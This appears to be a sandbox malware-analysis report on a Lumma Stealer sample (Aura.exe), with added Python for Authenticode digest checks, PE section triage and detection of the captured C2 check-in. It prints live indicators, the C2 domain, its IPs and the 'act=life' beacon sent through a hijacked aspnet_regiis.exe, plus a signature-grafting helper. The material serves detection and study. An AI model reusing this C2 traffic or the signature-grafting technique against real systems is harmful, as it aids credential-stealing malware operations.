                                              Serial:0997C56CAA59055394D9A9CDB8BEEB56
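The error number above is the signed-decimal form of 0x80096010 (TRUST_E_BAD_DIGEST), the first check WinVerifyTrust performs: it recomputes the file's Authenticode digest and compares it with the digest inside the PKCS#7 SignedData. The following Python is added here as an illustration and is not code from the Joe Sandbox report or from the sample. It computes the Authenticode digest the way the specification describes (the whole file minus the CheckSum field, the Security directory entry and the certificate table itself), then "grafts" a signature block onto a different binary and shows that the original still verifies while the grafted copy fails with exactly this error. The minimal PE images, the PKCS#7 placeholder bytes and every function name are constructed for the example; only the error number and the 0x80096010 value come from the report.

```python
import hashlib
import struct

TRUST_E_BAD_DIGEST = 0x80096010   # "The digital signature of the object did not verify"


def hresult(error_number: int) -> int:
    """Turn the signed decimal a report prints (-2146869232) back into the 32-bit HRESULT."""
    return error_number & 0xFFFFFFFF


def _layout(pe: bytes):
    """Locate the PE32/PE32+ headers; returns the offsets the hash and the grafter need."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections, = struct.unpack_from("<H", pe, e_lfanew + 6)
    size_opt, = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", pe, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    size_of_headers, = struct.unpack_from("<I", pe, opt + 60)
    dir_base = opt + (96 if magic == 0x10B else 112)
    return opt, opt + size_opt, nsections, size_of_headers, dir_base + 4 * 8   # index 4 = SECURITY


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Authenticode digest: file minus CheckSum, the Security directory entry and the certificate table."""
    opt, sec_hdr, nsections, size_of_headers, cert_dir = _layout(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, cert_dir)
    h = hashlib.new(algo)
    checksum = opt + 64
    h.update(pe[:checksum])                      # headers up to CheckSum
    h.update(pe[checksum + 4:cert_dir])          # ... up to the Security directory entry
    h.update(pe[cert_dir + 8:size_of_headers])   # ... rest of the headers
    sections = []
    for i in range(nsections):
        raw_size, raw_ptr = struct.unpack_from("<II", pe, sec_hdr + i * 40 + 16)
        if raw_size:
            sections.append((raw_ptr, raw_size))
    hashed = size_of_headers
    for raw_ptr, raw_size in sorted(sections):   # section bodies in file order
        h.update(pe[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    if len(pe) > hashed:                         # overlay, minus the certificate table itself
        tail = pe[hashed:]
        if cert_size and cert_off >= hashed:
            cut = cert_off - hashed
            tail = tail[:cut] + tail[cut + cert_size:]
        h.update(tail)
    return h.hexdigest()


def build_minimal_pe(body: bytes) -> bytes:
    """Constructed single-section PE32 standing in for a real binary (example data, not from the report)."""
    align = 0x200
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)   # i386, one section, PE32 optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, align)       # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 60, align)                           # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    raw_size = -(-len(body) // align) * align
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(body), 0x1000, raw_size, align, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(align, b"\0")
    return headers + body.ljust(raw_size, b"\0")


def graft_signature(pe: bytes, pkcs7: bytes) -> bytes:
    """Append a WIN_CERTIFICATE carrying `pkcs7` and point the Security directory at it (what a copy tool does)."""
    if len(pe) % 8:
        raise ValueError("certificate table must start on an 8-byte boundary")
    _, _, _, _, cert_dir = _layout(pe)
    cert = struct.pack("<IHH", 8 + len(pkcs7), 0x0200, 0x0002) + pkcs7   # revision 2.0, PKCS_SIGNED_DATA
    cert = cert.ljust(-(-len(cert) // 8) * 8, b"\0")
    out = bytearray(pe)
    struct.pack_into("<II", out, cert_dir, len(pe), len(cert))
    return bytes(out) + cert


def check_digest(signed_digest: str, pe: bytes) -> int:
    """0 if the file's digest equals the one inside its signature, else TRUST_E_BAD_DIGEST."""
    return 0 if authenticode_hash(pe) == signed_digest else TRUST_E_BAD_DIGEST


def demo() -> int:
    """Lift the signature of a (constructed) genuinely signed binary onto a different one and re-check it."""
    genuine = build_minimal_pe(b"\xFF\x25\x00\x60\x4B\x00" + b"\0" * 10)    # what the vendor actually signed
    signed_digest = authenticode_hash(genuine)                               # the digest embedded in its PKCS#7
    pkcs7 = b"\x30\x82" + b"constructed SignedData placeholder"               # stand-in for the real blob
    assert check_digest(signed_digest, graft_signature(genuine, pkcs7)) == 0  # original + own signature: verifies
    other = build_minimal_pe(b"\xFF\x25\x00\x60\x4B\x00" + b"\x90" * 10)     # different bytes, same stolen blob
    return check_digest(signed_digest, graft_signature(other, pkcs7))         # 0x80096010
```

The practical consequence for triage: a "valid-looking" issuer and subject chain says nothing about who built the file; only a digest match does, so treat a TRUST_E_BAD_DIGEST on a well-known vendor name as an indicator rather than as a false positive.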
                                              Instruction
                                              jmp dword ptr [004B6000h]
add byte ptr [eax], al   (this line is repeated 97 times in the listing: the bytes after the 6-byte jmp stub are 00 00 padding, which the disassembler decodes as add byte ptr [eax], al)
Data Directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9277c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x648 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xaf600 | 0x2628 | - (a file offset, not an RVA: the Authenticode certificate table; 0xaf600 + 0x2628 = 0xb1c28 = 728'104, the file size, so the signature block is the last thing in the file)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0xb6000 | 0x8 | (nameless section at 0xb6000)
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x92000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
$;3F&L | 0x2000 | 0x8f3f8 | 0x8f400 | cb6a4f3661634ec651d3cdb5e059fa89 | False | 1.0003169993455496 | data | 7.999725121175837 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text | 0x92000 | 0x1f010 | 0x1f200 | b1ff1f21f9ecb08cd371efb342967143 | False | 0.3293800200803213 | data | 4.689530449959602 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb2000 | 0x648 | 0x800 | 81b6fb8dfc5ceb4f589a3409a7c7a50d | False | 0.3505859375 | data | 3.5637252639120764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb4000 | 0xc | 0x200 | 9d7743fe20d48f4946db51a87cf62226 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless) | 0xb6000 | 0x10 | 0x200 | 7486388d5ab0f9dfde32da3bc1d9fb5d | False | 0.044921875 | data | 0.14263576814887827 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Resources
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xb20a0 | 0x3bc | data | - | - | 0.42677824267782427
RT_MANIFEST | 0xb245c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347
Imports
DLL | Import
mscoree.dll | _CorExeMain
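Read together, the section table, the IAT directory and the entry stub account for several of the report's signatures: a 0x8f400-byte section named $;3F&L that is readable, writable and executable with entropy 7.9997 (the encrypted payload that the "changes PE section rights" unpacking signature sees being decrypted in place), a nameless 16-byte section at 0xb6000 that holds both the 8-byte IAT and the entry point, and a jmp dword ptr [004B6000h] stub whose IAT slot resolves to the single import, mscoree!_CorExeMain. The Python below is added here as an illustration and is not code from the Joe Sandbox report; it re-derives those flags from the values printed above. The section records are copied from the table (entropies rounded), the stub bytes FF 25 00 60 4B 00 are reconstructed from the disassembly line, and the entropy threshold, the minimum payload size and the "normal section name" pattern are assumptions of the example.

```python
import re
import struct
from dataclasses import dataclass

# Section characteristic bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

IMAGE_BASE = 0x400000              # from the report
ENTRY_POINT = 0x4B600A             # from the report
IAT_RVA, IAT_SIZE = 0xB6000, 0x8   # IMAGE_DIRECTORY_ENTRY_IAT from the report


@dataclass
class Section:
    name: str
    va: int
    vsize: int
    raw_size: int
    entropy: float
    flags: int

    def contains(self, rva: int) -> bool:
        return self.va <= rva < self.va + max(self.vsize, self.raw_size)


# The section table as the report prints it (entropy rounded to four places)
REPORT_SECTIONS = [
    Section("$;3F&L", 0x2000, 0x8F3F8, 0x8F400, 7.9997,
            IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    Section(".text", 0x92000, 0x1F010, 0x1F200, 4.6895,
            IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    Section(".rsrc", 0xB2000, 0x648, 0x800, 3.5637,
            IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    Section(".reloc", 0xB4000, 0xC, 0x200, 0.0980,
            IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
    Section("", 0xB6000, 0x10, 0x200, 0.1426,
            IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
]

# Assumption: a normal section name is an optional dot plus up to seven [A-Za-z0-9_] characters
NORMAL_NAME = re.compile(r"^\.?[A-Za-z0-9_]{1,7}$")


def triage_sections(sections, entropy_threshold=7.2, min_payload=0x1000):
    """Return (section, reason) pairs for the static red flags the report's signatures describe.

    entropy_threshold and min_payload are assumed cut-offs, not values from the report."""
    findings = []
    for s in sections:
        label = s.name or "<nameless>"
        if not s.name:
            findings.append((label, "nameless section"))
        elif not NORMAL_NAME.match(s.name):
            findings.append((label, "section name with special characters"))
        if s.flags & IMAGE_SCN_MEM_WRITE and s.flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append((label, "writable and executable (RWX): code that rewrites itself or unpacks in place"))
        if s.entropy >= entropy_threshold and s.raw_size >= min_payload:
            findings.append((label, f"entropy {s.entropy:.4f} over {s.raw_size:#x} bytes: encrypted or compressed payload"))
    return findings


def decode_entry_stub(stub: bytes, image_base: int, iat_rva: int, iat_size: int):
    """Decode 'FF 25 imm32' (jmp dword ptr [imm32]) and say whether the slot it reads lies in the IAT.

    That is the shape of the standard CLR entry stub, which jumps through the IAT to _CorExeMain."""
    if len(stub) < 6 or stub[:2] != b"\xFF\x25":
        return None
    slot_va = struct.unpack_from("<I", stub, 2)[0]
    slot_rva = slot_va - image_base
    return {"slot_va": slot_va, "slot_rva": slot_rva,
            "via_iat": iat_rva <= slot_rva < iat_rva + iat_size}


def section_for_rva(sections, rva: int):
    """The section an RVA falls into, or None (e.g. an entry point pointing outside every section)."""
    return next((s for s in sections if s.contains(rva)), None)
```

Running triage_sections on the report's table yields four findings, all on the $;3F&L section and the nameless one; .text, .rsrc and .reloc are clean, which is the point: the visible managed code is a thin loader and the real payload sits in the RWX blob.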
Suricata IDS Alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T14:17:47.880345+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 104.21.33.116 | 443 | TCP
2024-11-23T14:17:49.331302+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49708 | 104.21.33.116 | 443 | TCP
2024-11-23T14:17:49.331302+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49708 | 104.21.33.116 | 443 | TCP
2024-11-23T14:17:50.300714+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49710 | 104.21.33.116 | 443 | TCP
TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 14:17:46.604371071 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:46.604420900 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:46.604521036 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:46.606002092 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:46.606033087 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:47.880184889 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:47.880345106 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:48.005230904 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:48.005254984 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:48.006333113 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:48.053390980 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:48.076342106 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:48.076441050 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:48.076510906 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:49.331402063 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:49.331687927 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:49.331768036 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:49.333530903 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:49.333568096 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:49.333601952 CET | 49708 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:49.333633900 CET | 443 | 49708 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:49.404381990 CET | 49710 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:49.404400110 CET | 443 | 49710 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:49.404472113 CET | 49710 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:49.404795885 CET | 49710 | 443 | 192.168.2.5 | 104.21.33.116
Nov 23, 2024 14:17:49.404810905 CET | 443 | 49710 | 104.21.33.116 | 192.168.2.5
Nov 23, 2024 14:17:50.300714016 CET | 49710 | 443 | 192.168.2.5 | 104.21.33.116
UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 14:17:46.307820082 CET | 55640 | 53 | 192.168.2.5 | 1.1.1.1
Nov 23, 2024 14:17:46.549971104 CET | 53 | 55640 | 1.1.1.1 | 192.168.2.5
DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 23, 2024 14:17:46.307820082 CET | 192.168.2.5 | 1.1.1.1 | 0x27b1 | Standard query (0) | property-imper.sbs | A (IP address) | IN (0x0001) | false
DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 23, 2024 14:17:46.549971104 CET | 1.1.1.1 | 192.168.2.5 | 0x27b1 | No error (0) | property-imper.sbs | - | 104.21.33.116 | A (IP address) | IN (0x0001) | false
Nov 23, 2024 14:17:46.549971104 CET | 1.1.1.1 | 192.168.2.5 | 0x27b1 | No error (0) | property-imper.sbs | - | 172.67.162.84 | A (IP address) | IN (0x0001) | false
                                              • property-imper.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 104.21.33.116 | 443 | 1992 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
HTTP Packets (session 0, owned by aspnet_regiis.exe PID 1992)
Timestamp | Bytes transferred | Direction | Data
2024-11-23 13:17:48 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: property-imper.sbs
2024-11-23 13:17:48 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-23 13:17:49 UTC | 1014 | IN | HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 13:17:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jo7maj0p55h12sqlstmff7hv7t; expires=Wed, 19-Mar-2025 07:04:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=erUchS9VEy2vnh60QhEUbedAanV%2Bbgod2cCRdt28jIcXV5NRAdiMjYeC%2FRpG5Ab3WUPRU3j1kULZ5PmQ1C0fR8YKcaUVPG66QxTV5i%2F7bSGreI9VU2LM1dbgmtdypiR9PaCYnOU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e7171087e0743e3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2401&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1199178&cwnd=234&unsent_bytes=0&cid=f91369745a780b80&ts=1471&x=0"
2024-11-23 13:17:49 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok (chunked transfer encoding: chunk-size line "2", CRLF, payload "ok", CRLF)
2024-11-23 13:17:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (terminating zero-length chunk; the decoded response body is just "ok")
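The exchange above is what the two Lumma Suricata signatures fired on: a form-encoded POST of act=life to /api, sent with a browser User-Agent from a process that is not a browser (the report attributes session 0 to the aspnet_regiis.exe it spawned), answered with a chunked body that decodes to the single token ok. The Python below is added here as an illustration and is not code from the Joe Sandbox report; it decodes the chunked frames shown in the capture and scores an HTTP exchange against those three traits. The HttpExchange record, the benign comparison request and the list of host processes that should never originate HTTP are constructed for the example; only aspnet_regiis.exe, the request and the two response frames come from the report.

```python
import re
from dataclasses import dataclass

# Host processes that should never originate outbound HTTP(S). aspnet_regiis.exe is the one the report
# shows carrying the C2 session; the other names are assumptions added for illustration.
QUIET_HOST_PROCESSES = {"aspnet_regiis.exe", "aspnet_compiler.exe", "regasm.exe", "regsvcs.exe"}


@dataclass
class HttpExchange:
    process: str            # image name of the process that owned the socket
    host: str
    method: str
    path: str
    request_headers: dict
    body: bytes
    response_headers: dict
    raw_response: bytes     # response body exactly as it came off the wire (may be chunked)


def decode_chunked(raw: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body; b"2\\r\\nok\\r\\n0\\r\\n\\r\\n" becomes b"ok"."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # the size line may carry ;extensions
        pos = eol + 2
        if size == 0:                                 # last-chunk; trailers, if any, are ignored
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size + 2                               # skip the CRLF that closes the chunk data


def checkin_indicators(x: HttpExchange) -> list:
    """Return the reasons an exchange looks like the stealer check-in captured in the report."""
    hits = []
    content_type = x.request_headers.get("Content-Type", "")
    if (x.method == "POST" and x.path == "/api"
            and content_type.startswith("application/x-www-form-urlencoded")
            and re.fullmatch(rb"act=[a-z]+", x.body)):          # act=life in the capture
        hits.append(f"form POST to /api with body {x.body.decode()!r}")
    if x.process.lower() in QUIET_HOST_PROCESSES:
        hits.append(f"{x.process} has no legitimate reason to contact {x.host}")
    chunked = x.response_headers.get("Transfer-Encoding", "").lower() == "chunked"
    body = decode_chunked(x.raw_response) if chunked else x.raw_response
    if hits and body.strip() == b"ok":                          # bare acknowledgement, only meaningful with a hit
        hits.append("server acknowledged with the bare string 'ok'")
    return hits


def run_demo() -> dict:
    """Constructed sample: the exchange from the report next to an ordinary browser request."""
    chrome_ua = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
    samples = [
        HttpExchange(
            process="aspnet_regiis.exe", host="property-imper.sbs", method="POST", path="/api",
            request_headers={"Content-Type": "application/x-www-form-urlencoded",
                             "Content-Length": "8", "User-Agent": chrome_ua},
            body=b"act=life",
            response_headers={"Transfer-Encoding": "chunked"},
            raw_response=b"2\r\nok\r\n0\r\n\r\n",   # the two IN frames: 32 0d 0a 6f 6b 0d 0a / 30 0d 0a 0d 0a
        ),
        HttpExchange(   # constructed benign request for comparison
            process="chrome.exe", host="example.com", method="GET", path="/",
            request_headers={"User-Agent": chrome_ua}, body=b"",
            response_headers={}, raw_response=b"<html>ok</html>",
        ),
    ]
    return {x.host: checkin_indicators(x) for x in samples}
```

The process attribution is the strongest of the three signals: the URL, the form body and the acknowledgement can all change between builds, but a .NET framework utility opening a TLS session to a freshly registered .sbs domain does not have a benign explanation.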


                                              Target ID:0
                                              Start time:08:17:44
                                              Start date:23/11/2024
                                              Path:C:\Users\user\Desktop\Aura.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Aura.exe"
                                              Imagebase:0x330000
                                              File size:728'104 bytes
                                              MD5 hash:137E48D526E2A840E07D309EDFFACA30
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:08:17:44
                                              Start date:23/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:08:17:44
                                              Start date:23/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                              Imagebase:0x230000
                                              File size:43'016 bytes
                                              MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:08:17:45
                                              Start date:23/11/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228
                                              Imagebase:0x60000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:08:18:01
                                              Start date:23/11/2024
                                              Path:C:\Windows\System32\SIHClient.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\sihclient.exe /cv jMwXD3dEvUmoR35eQmr9Ww.0.2
                                              Imagebase:0x7ff67bb50000
                                              File size:380'720 bytes
                                              MD5 hash:8BE47315BF30475EEECE8E39599E9273
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:16.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:8.4%
                                                Total number of Nodes:1447
                                                Total number of Limit Nodes:9
                                                execution_graph: the interactive call-graph widget for the image mapped at 0x6cdc0000 (1447 nodes). The page exports it as a flat token stream of node records (`id address [labels]`) and edges (`src->dst`); only the information recoverable from that stream is kept here.
                                                Labelled nodes are MSVC CRT symbols (__DllMainCRTStartup@12, dllmain_raw, dllmain_crt_dispatch, _ValidateLocalCookies, ___scrt_is_nonwritable_in_current_image, ___scrt_release_startup_lock, ___scrt_uninitialize_crt, __RTC_Initialize, __fassign, _free, ___vcrt_InitializeCriticalSectionEx, ___vcrt_uninitialize_ptd, ___vcrt_uninitialize_locks, ___vcrt_FlsGetValue, ___vcrt_FlsSetValue, ___std_type_info_destroy_list, __startOneArgErrorHandling, __raise_exc), i.e. the start-up and shutdown code of a DLL built against the Microsoft CRT.
                                                Windows APIs reached from the graph: GetCommandLineA, GetCommandLineW, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RaiseException, GetCurrentProcess, TerminateProcess, ExitProcess, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, GetPEB (the graph's label for a direct read of the PEB), GetModuleHandleW, GetModuleHandleExW, LoadLibraryExW, GetProcAddress, FreeLibrary, DecodePointer, GetProcessHeap, RtlAllocateHeap, HeapReAlloc, HeapFree, HeapSize, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, InitializeSListHead, InterlockedFlushSList, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetLastError, SetLastError, GetStartupInfoW, GetStdHandle, GetFileType.
                                                Caveat: the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter / GetCurrentProcess / TerminateProcess chains at 6cdc204b, 6cdc4962 and 6cdc1ab1, each gated by an IsProcessorFeaturePresent call, and the GetSystemTimeAsFileTime / GetCurrentThreadId / GetCurrentProcessId / QueryPerformanceCounter chain at 6cdc1bd3 have the shape of the MSVC CRT's __scrt_fastfail / __report_gsfailure abort path and __security_init_cookie. They are CRT boilerplate and by themselves do not show the sample performing a debugger check; the signature "Contains functionality to check if a debugger is running (IsDebuggerPresent)" needs corroboration from code outside these CRT routines.
